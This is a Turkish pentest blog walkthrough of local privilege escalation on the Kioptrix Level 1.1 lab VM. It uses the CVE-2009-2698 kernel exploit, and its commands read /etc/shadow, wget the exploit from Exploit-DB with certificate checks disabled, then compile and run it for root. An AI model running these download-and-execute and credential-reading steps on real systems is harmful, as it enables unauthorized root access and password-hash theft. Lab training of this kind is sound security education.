CentOS 4.5 – Linux Kernel 2.6.9.55 İşletim Sistemindeki Hak Yükseltme Zafiyetinin (ip_append_data()) İstismar Edilerek root Yetkileri ile Komut Satırının Elde Edilmesi

0
548
views
Linux sızma testleri sırasında standart haklar ile erişim sağlanabilmiş bir bilgisayarda, hak yükseltilerek yönetici hakları elde edilmeye çalışılır. Hak yükseltmek için kullanılan yöntemlerden birisi de işletim sistemindeki zafiyetlerin istismar edilmesidir. Bu yazıda, Linux Kernel 2.6.9-55 çekirdeğine ve CentOS 4.5 işletim sistemine sahip Kioptrix: Seviye – 1.1 (#2) sanal makinesi üzerinde çalışan bir zafiyet (CVE-2009-2698) istismar edilerek standart kullanıcı haklarından “root” kullanıcısı hakkı ile komut satırı / kabuk elde edilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Yazıda kullanılan Kioptrix: Seviye – 1.1 (#2) sanal makinesi Vulnhub sitesinden indirilebilir.

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

Linux işletim sistemine standart yetkilerle elde edilen erişimde uygulama kullanıcısı (www-data) haklarına sahip olunduğu görülmektedir.

id
head -3 /etc/passwd
head -3 /etc/shadow

 

İşletim sisteminin sürüm bilgilerine bakıldığında Centos 4.5 kullanıldığı ve Linux çekirdek sürümünün 2.6.9-55 olduğu görülmektedir.

uname -a
cat /etc/redhat-release

 

Linux Kernel 2.6.9-55’te birçok kritik zafiyet bulunmaktadır.

searchsploit Linux Kernel -t 2.6.| grep -v “/dos/”

 

Bu zafiyete ait istismar kodlarının en önemlilerinden biri de Exploit-db’de 9542 numaralı istismar kodudur.

 

CVE-2009-2698 ID’li bu zafiyet UDP implementasyonundan kaynaklanmaktadır. Bu zafiyet ile Linux’un 2.6.19 sürümünden daha eski çekirdeklerde udp_sendmsg fonksiyonu istismar edilebilemekte ve hak yükseltilebilmektedir.

https://www.exploit-db.com/exploits/9542/
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) – ‘ip_append_data()’ Ring0 Privilege Escalation (1)

 

Hedef sisteme bu dosya indirilir ve bu dosyanın C dosya tipinde olduğu görülür.

pwd
ls
wget https://www.exploit-db.com/download/9542 –no-check-certificate -O IstismarKaynakKodu.c
ls -la

 

İstismar kodu derlenir.

gcc IstismarKaynakKodu.c -o HakYukseltme
ls -la

 

Sonrasında çalıştırılır ve “root” yetkilerine erişim sağlanılmış olur.

./HakYukseltme
id
head -3 /etc/shadow

 

Kaynak:

https://jhalon.github.io/vulnhub-kioptrix2/
https://kongwenbin.wordpress.com/2016/10/29/writeup-for-kioptrix-level-1-1-2/

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.